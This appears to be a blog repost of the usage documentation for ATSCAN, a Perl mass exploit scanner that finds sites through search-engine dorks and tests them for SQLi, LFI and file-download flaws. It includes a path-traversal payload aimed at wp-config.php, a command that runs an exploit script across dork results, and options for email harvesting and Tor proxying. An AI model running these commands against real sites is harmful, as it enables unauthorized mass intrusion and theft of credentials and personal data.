ATSCAN - Advanced Search & Mass Exploit Scanner

ATSCAN - Advanced Search & Mass Exploit Scanner

ATSCAN is an advanced search & mass exploit scanner written in Perl.


  • Search engine Google / Bing / Ask / Yandex / Sogou 
  • Mass Dork Search
  • Multiple instant scans. 
  • Mass Exploitation 
  • Use proxy. 
  • Random user agent. 
  • Random engine.
  • Extern commands execution.
  • XSS / SQLI / LFI / AFD scanner.
  • Filter WordPress and Joomla sites. 
  • Find Admin page.
  • Decode / Encode Base64 / MD5
  • Ports scan. 
  • Collect IPs
  • Collect E-mails. 
  • Auto-detect errors. 
  • Auto-detects Cms.
  • Post data.
  • Auto sequence repeater.
  • Validation.
  • Post and Get method
  • Interactive and Normal interface.
  • And more...

Libraries to install:

  • Perl Required. 
  • Works on all platforms. Disponible in Blackarch Linux and Dracos systems.


chmod +x ./


chmod +x ./


Portable Execution: perl ./
Installed Tool Execution: atscan
Menu: Applications > Web Application analysis > atscan

Uninstall Tool:

atscan --uninstall



--help / -h     Help.
--proxy         Set tor proxy for scans [EX: --proxy "socks://localhost:9050"]
                Set proxy [EX: --proxy ""] 
                Set proxy list [EX: --proxy list.txt]
--motor / -m    Set engine motors default bing EX: -m [Bing: 1][Google: 2][Ask: 3]
                [Yandex: 4][Sogou: 5][All: all]
--proxy-random  Random proxy [EX: --proxy-random list.txt] or --proxy-random 
--m-random      Random of all disponibles engines
--b-random      Random all disponibles agents
--freq          Random time frequency (in seconds)
--time          set browser time out
--dork / -d     Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
--target / -t   Target
--level / -l    Scan level (+- Number of page results to scan)
--zone          Search engine country.
--param / -p    Set test parameter EX:id,cat,product_ID
--save / -s     Output.
--source        Html output file
--content       Print request content
--data          Post and Get forms. See examples
--post          Use post method
--get           Use get method
--header        Set Headers
--host          Domain name [Ex:]
--nobanner      Hide tool banner
--beep          Produce beep sound if positive scan found.
--ifend         Produce beep sound when scan process is finished.
--noinfo        Jump extra results info.
--ping          Host ping.
--limit         Limit max positive scan results.
--valid / -v    Validate by string
--status        Validate by http header status
--ifinurl       Get targets with exact string matching
--sregex        Get targets with exact regex matching
--none          Get negative validation or engine regex matching
--notin         Get targets where string doesn't exist in HTML
--unique        Get targets with exact dork matching
--replace       Replace exact string
--replaceFROM   Replace from string to the end of target
--payload       Use your own payloads instead of tool ones
--exp / -e      Exploit/Payload will be added to full target
--expHost       Exploit will be added to the host
--expIp         Exploit will be added to the host ip
--sql           Xss scan
--lfi           Local file inclusion
--joomrfi       Scan for joomla local file inclusion.
--shell         Shell link [Ex:]
--wpafd         Scan wordpress sites for arbitrary file download
--admin         Get site admin page
--shost         Get site subdomains
--tcp           TCP port
--udp           UDP port
--index         Get target engine index
--wp            Wordpress sites in the server
--joom          Joomla sites in the server
--upload        Get upload files
--zip           Get zip files
--md5           Convert to md5
--encode64      Encode base64 string
--decode64      decode base64 string
--TARGET        Will be replaced by target in extern command
--HOST          Will be replaced by host in extern command
--HOSTIP        Will be replaced by host IP in extern command
--PORT          Will be replaced by open port in extern command
--ip            Crawl to get Ips
--regex         Crawl to get strings matching regex
--noquery       Remove string value from Query url [ex:]
--command / -c  Extern Command to execute
--email         Get emails
rang(x-y)       EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "
                id=rang(1-9)" -> 9.
repeat(txt-y)   EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t 
                In then
                ../../wp-config.php 9 times
[OTHER]         To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
[DATA/DATAFILE] To separate data values ex: --data "name:username [DATA]email:xxxxxx 
--update        Update tool
--tool / -?     Tool info.
--config        User configuration.
--interactive   Interactive mode interface.
--uninstall     Uninstall Tool.


  • PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: 
or --proxy list.txt Ex: --proxy my_proxies.txt 

Random proxy: --proxy-random [proxy list.txt] 
Random browser: --b-random 
Random engine: --m-random 

atscan --dork [dork / dorks.txt] --level [level] --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1" 
atscan -t target --data "name:userfile[DATAFILE]value:file.txt --post --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1" 

Search: atscan --dork [dork] --level [level] 
Search: atscan -d [dork] -l [level] 
Set engine: atscan --dork [dork] --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all] 
Set selective engines: atscan -d [dork] -l [level] -m 1,2,3.. 
Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level] 
Search and rand: atscan -d [dork] -l [level] --expHost "/index.php?id=rang(1-9)" --sql 
Get target engine index: atscan -t [target] --level [value] --index 
Get Server wordpress sites: atscan -t [target] --wp 
Search + output: atscan --dork [dorks.txt] --level [level] --save 
Search + get emails: atscan -d [dorks.txt] -l [level] --email 
Search + get site emails: atscan --dork --level [level] --email 
Search + get ips: atscan --dork [dork] --level [level] --ip 

Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex] 
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)) 
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})' 

atscan -t --sql 
atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql 
atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php" 

  • PORTS:
atscan -t [ip] --port [port] [--udp / --tcp] 
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp] 
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"

Generate MD5: --md5 [string] 
Encode base64: --encode64 [string] 
Decode base64: --decode64 [string] 

  • DATA:
Post data: atscan -t [target] --data "field1:value1 [DATA]field2:value2 [DATA]field3:value3" [--post / --get]
Wordlist: atscan -t [target] --data "name:userfile [DATAFILE]value:file.txt" [--post / --get]
atscan -t [target] --data "username:john [DATA]pass:1234" [--post / --get]
Post + Validation: --data "name:userfile [DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get] 

atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET" 
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST" 
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP" 
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET" 

atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...] 

atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt]

atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --status [code] --none (Positive when status does\'nt match)
atscan -d [dork / dorks.txt] -l [level] --status [code] / -v [string] / --ifinurl [string] / --sregex [regex] --none
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string] 
atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --unique 

atscan -t [target / targets.txt] [--status [code] / --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string] 
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string] 
atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string] 
atscan -t [target / targets.txt] --valid [string] --not in [string]

atscan --update 

No comments

Powered by Blogger.